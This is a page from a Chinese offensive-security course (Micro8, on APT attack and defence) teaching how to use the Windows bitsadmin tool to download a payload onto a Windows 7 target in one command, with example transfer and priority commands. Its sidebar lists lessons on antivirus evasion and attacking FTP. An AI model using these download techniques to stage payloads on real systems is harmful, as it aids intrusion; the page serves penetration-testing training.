Micro8
专注APT攻击与防御
Search…
前言
Preface
目录
第一章:生
1-10课
11-20课
21-30课
31-40课
41-50课
第四十一课:bitsadmin一句话下载payload
第四十二课:攻击FTP服务
第四十三课:js一句话下载payload
第四十四课:ertutil一句话下载payload补充
第四十五课:解决bat一句话下载payload黑窗
第四十六课:powershell一句话下载payload
第四十七课:payload分离免杀思路
第四十八课:payload分离免杀思路第二季
第四十九课:关于Powershell对抗安全软件
第五十课:基于SqlDataSourceEnumerator发现内网存活主机
51-60课
61-70课
71-80课
81-90课
91-100课
第二章:老(待更新...)
第三章:病(待更新...)
Powered By
GitBook
第四十一课:bitsadmin一句话下载payload
微软官方做出如下解释:
BITSAdmin是一个命令行工具,可用于创建下载或上传并监视其进度。
具体相关参数参见官方文档:
https://docs.microsoft.com/zh-cn/windows/desktop/Bits/bitsadmin-tool
自 windows7 以上版本内置 bitsadmin,它可以在网络不稳定的状态下下载文件,出错会自动重试,在比较复杂的网络环境下,有着不错的性能。
靶机:windows 7
1
E:
\
>
bitsadmin /rawreturn /transfer down
"http://192.168.1.115/robots.txt"
E:
\
PDF
\
robots.txt
Copied!
需要注意的是,bitsadmin要求服务器支持Range标头。
如果需要下载过大的文件,需要提高优先级。配合上面的下载命令。再次执行
1
bitsadmin /setpriority down foreground
Copied!
如果下载文件在1-5M之间,需要时时查看进度。同样它也支持进度条。
1
bitsadmin /transfer down /download /priority normal
"http://192.168.1.115/robots.txt"
E:
\
PDF
\
robots.txt
Copied!
后者的话:不支持https协议。
Micropoor
Previous
41-50课
Next
第四十二课:攻击FTP服务
Last modified
3yr ago
Copy link